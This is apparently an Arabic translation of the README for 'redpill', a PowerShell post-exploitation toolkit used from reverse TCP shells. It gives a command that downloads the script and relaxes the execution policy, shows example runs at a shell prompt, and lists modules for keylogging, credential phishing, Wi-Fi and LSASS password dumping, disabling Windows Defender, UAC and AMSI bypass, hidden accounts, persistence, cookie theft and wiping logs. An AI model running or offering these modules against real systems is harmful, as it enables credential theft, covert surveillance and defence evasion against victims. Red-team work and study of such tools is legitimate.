
مساعدة قذائف TCP العكسية في مهام ما بعد الاستكشاف

يهدف مشروع redpill إلى مساعدة صدفات tcp العكسية في مهام ما بعد الاستغلال. غالبًا، في مواعيد الفريق الأحمر
نحتاج إلى استخدام طرق غير تقليدية للوصول إلى النظام المستهدف، مثل صدفات tcp العكسية (ليست metasploit) من أجل
تجاوز الدفاعات التي ينفذها مسؤول النظام. بعد اكتمال الخطوة الأولى بنجاح
نواجه نوعًا آخر من المشاكل: "لدي وصول (صدفة) إلى النظام المستهدف، وماذا يمكنني أن أفعل به الآن؟"
يتكون هذا المشروع من عدة سكربتات PowerShell تؤدي مهام ما بعد الاستغلال المختلفة و
السكربت الرئيسي redpill.ps1 الذي تتمثل مهمته الرئيسية في تنزيل/تكوين/تنفيذ السكربتات الموجودة في هذا المستودع.
الهدف هو الحصول على تجربة مماثلة لـ meterpreter في موجه الصدفة العكسية لدينا (خيارات مشابهة لـ meterpreter)
ينتمي هذا cmdlet إلى هيكل venom v1.0.17.8 كوحدة ما بعد الاستغلال.
تقوم عوامل تجنب amsi في venom برفع هذا CmdLet تلقائيًا إلى دليل %TMP% ليكون
سهل الوصول إليه في صدفة tcp العكسية لدينا (موجه الصدفة).
لعرض جميع المعاملات المتاحة، نفذ في موجه powershell:
.\redpill.ps1 -Help Parameters
ينتمي هذا cmdlet إلى هيكل venom v1.0.17.8 كوحدة ما بعد الاستغلال.
تقوم عوامل تجنب amsi في venom برفع هذا CmdLet تلقائيًا إلى دليل %TMP% ليكون
سهل الوصول إليه في صدفة tcp العكسية لدينا (صدفة).
'يصف هذا القسم كيفية اختبار هذا Cmdlet محليًا دون استغلال المضيف المستهدف'
1º - تنزيل CmdLet من مستودع GitHub إلى 'القرص المحلي'
iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/redpill.ps1 -OutFile redpill.ps1|Unblock-File
2º - تعيين سياسة تنفيذ PowerShell إلى 'غير مقيدة'
Set-ExecutionPolicy UnRestricted -Scope CurrentUser

3º - الانتقال إلى دليل تخزين 'redpill.ps1'
cd C:\Users\pedro\Desktop

4º - الوصول إلى قائمة المساعدة الخاصة بـ CmdLet {جميع المعاملات}
.\redpill.ps1 -Help Parameters
ينتمي هذا cmdlet إلى هيكل venom v1.0.17.8 كوحدة ما بعد الاستغلال.
تقوم عوامل تجنب amsi في venom برفع هذا CmdLet تلقائيًا إلى دليل %TMP% ليكون
سهل الوصول إليه في صدفة tcp العكسية لدينا (موجه الصدفة).
1º - نفذ في موجه الصدفة العكسية tcp
[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -Help Parameters

2º - الوصول إلى مساعدة المعامل التفصيلية لـ [ -WifiPasswords ]
[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -Help WifiPasswords

3º - تشغيل وحدة [ -WifiPasswords ] [ Dump ]
[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -WifiPasswords Dump

iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/redpill.ps1 -OutFile redpill.ps1|Unblock-File

عرض توضيحي - يستخدم هذا البرنامج التعليمي وحدات: sysinfo, GetPasswords, UacMe
MouseLogger - التقاط لقطات شاشة 'نقرات الماوس' بمساعدة psr.exe
PhishCreds - تصيد بيانات اعتماد تسجيل الدخول أو اختراق كلمة مرور حساب المستخدم
FileMace - تغيير الطابع الزمني للملف {CreationTime, LastAccessTime, LastWriteTime}
CsOnTheFly - تنزيل (من عنوان url)، ترجمة تلقائية وتنفيذ سكربتات CS بسرعة!
EOP - العثور على تصحيحات البرامج المفقودة لتصعيد الامتيازات






أي تعاونات أو تقارير عن الأخطاء مرحب بها
| اسم معامل CmdLet | وسائط المعامل | الوصف |
|---|
| -SysInfo | Enum | Verbose | معلومات سريعة عن النظام أو تعداد مفصل |
| -GetConnections | Enum | Verbose | تعداد اتصالات TCP النشطة للمضيف البعيد |
| -GetDnsCache | Enum | Clear | تعداد/مسح إدخالات ذاكرة التخزين المؤقت DNS للمضيف البعيد |
| -GetInstalled | Enum | تعداد التطبيقات المثبتة على المضيف البعيد |
| -GetProcess | Enum | Kill | Tokens | تعداد أو قتل العمليات الجارية على المضيف البعيد |
| -GetTasks | Enum | Create | Delete | تعداد/إنشاء/حذف المهام الجارية على المضيف البعيد |
| -GetLogs | Enum | Verbose | Clear | تعداد سجلات eventvwr أو مسح جميع سجلات الأحداث |
| -LiveStream | Bind | Reverse | Stop | سكربت Nishang لبث سطح المكتب المستهدف باستخدام MJPEG |
| -GetBrowsers | Enum | Verbose | Creds | تعداد المتصفحات المثبتة وإصداراتها أو تعداد مفصل |
| -GetSkype | Contacts|DomainUsers | تعداد ومهاجمة Skype الموحد (federated) |
| -Screenshot | 1 | التقاط لقطة شاشة لسطح المكتب وتخزينها في %TMP% |
| -Camera | Enum | Snap | تعداد كاميرات الويب بالكمبيوتر أو التقاط لقطة من كاميرا الويب الافتراضية |
| -StartWebServer | Python | Powershell | تنزيل خادم الويب إلى %TMP% وتنفيذه |
| -Keylogger | Start | Stop | بدء أو إيقاف تسجيل ضغطات المفاتيح على المضيف البعيد |
| -MouseLogger | Start | التقاط لقطات شاشة عند نقرات الماوس لمدة 10 ثوانٍ |
| -PhishCreds | Start | Brute | مطالبة المستخدم الحالي ببيانات اعتماد صالحة وتسريب الالتقاطات |
| -GetPasswords | Enum | Dump | تعداد كلمات المرور من مواقع مختلفة {Store|Regedit|Disk} |
| -PasswordSpray | Spray | هجوم رش كلمة المرور ضد الحسابات في Active Directory! |
| -WifiPasswords | Dump | ZipDump | تعداد شبكات SSID المتاحة أو تفريغ جميع كلمات مرور Wi-Fi مضغوطة |
| -EOP | Enum | Verbose | العثور على تصحيحات البرامج المفقودة لتصعيد الامتيازات |
| -ADS | Enum | Create | Exec | Clear | إخفاء السكربتات { bat | ps1 | exe } في سجلات $DATA (ADS) |
| -BruteZip | $Env:TMP\archive.zip | كسر أرشيف Zip محدد بمساعدة 7z.exe |
| -Upload | script.ps1 | رفع script.ps1 من جذر خادم apache2 للمهاجم |
| -Persiste | $Env:TMP\Script.ps1 | استمرار script.ps1 عند كل بدء تشغيل {BeaconHome} |
| -CleanTracks | Clear | Paranoid | تنظيف آثار القرص المتروكة {تنظيف آثار النظام} |
| -AppLocker | Enum | WhoAmi | TestBat | تعداد أدلة AppLocker ذات الصلاحيات الضعيفة |
| -FileMace | $Env:TMP\test.txt | تغيير بصمة الملف {CreationTime,LastAccessTime,LastWriteTime} |
| -MetaData | $Env:TMP\test.exe | عرض وصف الملفات/التطبيقات (البيانات الوصفية) |
| -psgetsys | Enum | Auto | Impersonate | إنشاء عملية تحت عملية أب مختلفة! |
| -MsgBox | "Hello World." | ظهور مربع رسالة "Hello World." على المضيف المحلي {wscriptComObject} |
| -SpeakPrank | "Hello World." | جعل المضيف البعيد ينطق جملة إدخال المستخدم {مزحة} |
| -NetTrace | Enum | تعداد عدواني بمساعدة netsh {أصلي} |
| -PingSweep | Enum | Verbose | تعداد عناوين IP النشطة والمنافذ المفتوحة على الشبكة المحلية |
| -DnsSpoof | Enum | Redirect | Clear | إعادة توجيه أسماء النطاقات إلى عنوان IP للتصيد الخاص بنا |
| -DisableAV | Query | Start | Stop | تعطيل خدمة Windows Defender (WinDefend) |
| -HiddenUser | Query | Create | Delete | استعلام \ إنشاء \ حذف حسابات المستخدمين المخفية |
| -CsOnTheFly | Compile | Execute | تنزيل \ ترجمة (إلى exe) وتنفيذ سكربتات CS |
| -CookieHijack | Dump|History | أداة اختطاف ملفات تعريف الارتباط Edge|Chrome |
| -UacMe | Bypass | Elevate | Clean | تجاوز UAC | تصعيد الامتيازات عن طريق انعكاس dll! (cmstp.exe) |
| -GetAdmin | check | exec | تصعيد الجلسات من UserLand إلى Administrator! |
| -NoAmsi | List | TestAll | Bypass | اختبار تجاوزات AMSI أو تنفيذ تجاوز واحد ببساطة |
| -Clipboard | Enum | Capture | Prank | التقاط محتويات الحافظة من نص\ملف\صورة\صوت! |
| -GetCounterMeasures | Enum | verbose | سرد العمليات الأمنية الشائعة \ معرفات العمليات الجارية! |
| -DumpLsass | lsass| all | تفريغ البيانات من عملية lsass/sam/system/security/سجلات التسجيل |
لعرض معلومات مفصلة حول كل معامل، نفذ:
الصيغة : .\redpill.ps1 -Help [ اسم المعامل ]
مثال: .\redpill.ps1 -Help WifiPasswords


5º - الوصول إلى مساعدة المعامل التفصيلية لـ [ -WifiPasswords ]
الصيغة : .\redpill.ps1 -Help [ اسم المعامل ]
مثال: .\redpill.ps1 -Help WifiPasswords

6º - تشغيل وحدة [ -WifiPasswords ] [ Dump ]
الصيغة : .\redpill.ps1 [ اسم المعامل ] [ @الوسيطة ]
مثال: .\redpill.ps1 -WifiPasswords Dump

7º - تشغيل وحدة [ -sysinfo ] [ Enum ]
الصيغة : .\redpill.ps1 [ اسم المعامل ] [ @الوسيطة ]
مثال: .\redpill.ps1 -sysinfo Enum

| hax0r | الوظيفة | إصدار النظام |
|---|
| @youhacker55 | لكل المساعدة في تصحيح أخطاء هذا cmdlet (اختبار النسخة BETA) | Windows 7 x64bits |
| @0xyg3n | لكل المساعدة في تصحيح أخطاء هذا cmdlet (اختبار النسخة BETA) | Windows 10 x64bits |
| @Shanty_Damayanti | تصحيح أخطاء هذا cmdlet (تجاوزات كشف سلسلة amsi) | Windows 10 x64bits |
| @miltinhoc | تصحيح أخطاء هذا cmdlet وتسجيل دروس فيديو | Windows 10 x64bits |